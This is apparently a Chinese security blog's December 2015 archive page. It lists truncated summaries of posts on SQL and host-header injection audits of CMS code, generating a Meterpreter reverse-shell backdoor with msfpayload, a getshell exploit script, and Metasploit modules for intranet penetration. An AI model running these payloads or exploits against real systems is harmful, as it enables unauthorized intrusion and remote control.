12 2015 档案

摘要:看文件 :/framework/model/www/site_model.php 66行估计主机头注入很少能发现。在多处调用了我们就直接拿留言板处测试。public function get_one_from_domain($domain='') { $sql = "SELECT site_id F... 阅读全文
posted @ 2015-12-29 17:53 blck 阅读(571) 评论(0) 推荐(0)
摘要:想起早些年就已经很少玩审计了,后来因为合作方的原因就down了一份源码分析了一些,在很多地方都调用过滤函数。最后在评论一处发现了未过滤的地方,我们看看。见文件:function\plugs\Comment\product-content.php 97-109行$sql="insert into `o... 阅读全文
posted @ 2015-12-29 09:26 blck 阅读(516) 评论(0) 推荐(0)
摘要:反弹的shell,这里介绍两种payload: Windows/meterpreter/reverse_tcp Windows/meterpreter/reverse_https windows/meterpreter/reverse_http 生成反弹后门: msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=... 阅读全文
posted @ 2015-12-22 17:25 blck 阅读(1378) 评论(0) 推荐(0)
摘要:利用脚本。exp:python jj.py http://123.123.123.123 ->直接GETSHELL python jj.py http://123.123.123.123 "whoami" ->执行命令#author:we8i&90secimport url... 阅读全文
posted @ 2015-12-19 10:27 blck 阅读(1770) 评论(0) 推荐(0)
摘要:下面附上内网渗透中可能用得上的msf 模块 scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫描 auxiliary/scanner/smb/smb_login SMB登录测试扫描use windows/smb/psexec SMB登录,可 阅读全文
posted @ 2015-12-02 11:06 blck 阅读(772) 评论(0) 推荐(0)